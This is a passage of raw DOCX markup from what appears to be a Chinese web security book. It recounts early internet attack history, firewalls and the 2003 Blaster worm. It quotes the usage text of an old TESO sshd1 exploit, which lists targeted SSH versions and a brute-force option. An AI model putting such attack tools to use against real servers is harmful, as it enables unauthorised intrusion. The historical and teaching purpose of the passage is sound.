        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>下面是这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>的一些信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.978145pt;width:411.15pt;height:60pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2368;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>root@plac /bin &gt;&gt; ./ssh</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:sz w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="877" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2392;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,76.018143pt" to="158.16pt,76.018143pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark1" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://staff.washington.edu/dittrich/misc/ssh-analysis.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId13"/>
          <w:headerReference w:type="even" r:id="rId14"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
          <w:pgNumType w:start="3"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:411.15pt;height:200.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="3470" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>greets: mray, random, big t, sh1fty, scut, dvorak ps. this sploit already owned cia.gov :/</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="6"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="17"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>**please pick a type**</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="1"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="19"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="5582" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Usage: ./ssh host [options] Options:</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-p port</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
                    <w:ind w:left="28" w:right="1295" w:firstLine="158"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-b baseBase address to start bruteforcing distance, by default 0x1800, goes as high as 0x10000</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-t type</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:pos="1257" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-d</w:t>
                    <w:tab/>
                    <w:t>debug</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>mode</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:pos="868" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="530" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="5335" w:firstLine="158"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-o</w:t>
                    <w:tab/>
                    <w:t>Add this to delta_min types:</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="179" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>0: linux/x86 ssh.com 1.2.26-1.2.31 rhl</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
                    <w:ind w:left="28" w:right="4063" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>1: linux/x86 openssh 1.2.3 (maybe others) 2: linux/x86 openssh 2.2.0p1 (maybe others) 3: freebsd 4.x, ssh.com 1.2.26-1.2.31</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-15"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>rhl</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="146"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>有趣的是，这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>还曾经出现在著名电影《黑客帝国 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>》中：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="2440">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>970788</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>118443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3605345" cy="1530096"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="5" name="image3.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="6" name="image3.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3605345" cy="1530096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="158"/>
        <w:ind w:left="0" w:right="15" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>电影《黑客帝国 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>放大屏幕上的文字可以看到：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="2464">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>970788</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>98615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3592656" cy="2236851"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7" name="image4.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="8" name="image4.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3592656" cy="2236851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="168"/>
        <w:ind w:left="0" w:right="17" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>电影《黑客帝国 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>》中使用的著名 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>在早期互联网中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>并非互联网的主流应用，相对来说，基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POP3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IRC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>等协议的服务拥有着绝大多数的用户。因此黑客们主要的攻击目标是网络、操作系统以及软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>等领域，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>安全领域的攻击与防御技术均处于非常原始的阶段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="202" w:right="224" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>相对于那些攻击系统软件的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>而言，基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的攻击，一般只能让黑客获得一个较低权限的账户，对黑客的吸引力远远不如直接攻击系统软件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="202" w:right="123" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>但是时代在发展，防火墙技术的兴起改变了互联网安全的格局。尤其是以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、华为等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>为代表的网络设备厂商，开始在网络产品中更加重视网络安全，最终改变了互联网安全的走向。防火墙、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>技术的兴起，使得直接暴露在互联网上的系统得到了保护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="202" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>比如一个网站的数据库，在没有保护的情况下，数据库服务端口是允许任何人随意连接的； </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>在有了防火墙的保护后，通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ACL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可以控制只允许信任来源的访问。这些措施在很大程度上保证了系统软件处于信任边界之内，从而杜绝了大部分的攻击来源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="202" w:right="224" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2003 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>年的冲击波蠕虫是一个里程碑式的事件，这个针对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>操作系统 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>RPC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>（运</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>行在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>445 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>的蠕虫，在很短的时间内席卷了全球，造成了数百万台机器被感染，损失难以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>估量。在此次事件后，网络运营商们很坚决地在骨干网络上屏蔽了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>445 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等端口的连接请求。此次事件之后，整个互联网对于安全的重视达到了一个空前的高度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>运营商、防火墙对于网络的封锁，使得暴露在互联网上的非 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
